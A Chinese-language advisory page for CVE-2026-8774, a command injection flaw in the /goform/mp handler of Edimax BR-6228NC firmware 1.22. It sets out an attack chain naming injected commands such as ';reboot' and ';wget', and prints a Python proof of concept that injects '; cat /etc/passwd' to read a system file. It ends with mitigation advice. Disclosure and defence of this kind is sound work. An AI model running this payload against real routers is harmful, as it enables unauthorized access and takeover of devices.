CVE-2026-8774 CVSS 6.3 中危

CVE-2026-8774 Edimax路由器命令注入漏洞

披露日期: 2026-05-18

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-8774

漏洞类型

命令注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Edimax BR-6228NC

漏洞概述

Edimax BR-6228NC路由器1.22版本中存在一处命令注入漏洞。该漏洞位于组件POST请求处理程序的/goform/mp文件中的mp函数中。由于对传入参数command缺乏严格的过滤机制，攻击者可以通过恶意构造该参数来注入操作系统命令。该漏洞允许攻击者进行远程攻击，且无需用户交互，目前利用代码已公开，攻击者可利用此漏洞获取系统权限，影响设备的机密性、完整性和可用性。

技术细节

该漏洞的根源在于Edimax BR-6228NC设备在处理特定API请求时，直接将用户输入拼接至系统命令中执行。具体受影响的端点是/goform/mp，该端点通过POST请求接收参数，并传递给后端的mp函数处理。当攻击者向该接口发送包含恶意命令的'command'参数时（例如利用分号、管道符等Shell元字符），后端未经过滤便将其传递给操作系统Shell执行。根据CVSS 3.1向量分析，该攻击具有网络攻击向量（AV:N），攻击复杂度低（AC:L），且无需用户交互（UI:N）。虽然需要低权限（PR:L），但在IoT设备语境下，往往可通过默认凭据或无需认证即可访问管理接口，从而进一步利用此漏洞执行任意系统命令，导致设备被完全控制。

攻击链分析

STEP 1

侦察

攻击者扫描网络，识别出存在漏洞的Edimax BR-6228NC设备及其Web管理接口。

STEP 2

漏洞利用

攻击者向/goform/mp端点发送特制的POST请求，在command参数中注入恶意Shell命令（如;reboot或;wget）。

STEP 3

命令执行

服务器端未对command参数进行过滤，直接将其传递给系统Shell执行，导致攻击者的恶意命令在设备上运行。

STEP 4

建立控制

攻击者利用执行命令的权限，获取设备敏感信息、植入后门或破坏系统服务，实现对设备的控制。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL setup
target_ip = "192.168.1.1"
url = f"http://{target_ip}/goform/mp"

# Vulnerable parameter 'command'
# Example payload to inject a command. 
# Using a semicolon to chain commands in the shell.
payload_data = {
    "command": "; cat /etc/passwd" 
}

try:
    print(f"Sending payload to {url}...")
    response = requests.post(url, data=payload_data, timeout=5)
    
    if response.status_code == 200:
        print("Request sent successfully.")
        print("Response:")
        print(response.text)
    else:
        print(f"Failed with status code: {response.status_code}")
except Exception as e:
    print(f"An error occurred: {e}")

影响范围

Edimax BR-6228NC 1.22

防御指南

临时缓解措施

如果无法立即升级固件，建议用户通过访问控制列表（ACL）严格限制对设备管理端口（通常是80/443）的访问来源，确保攻击者无法从外部网络访问/goform/mp接口。同时，应定期检查路由器日志是否存在异常的POST请求记录。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表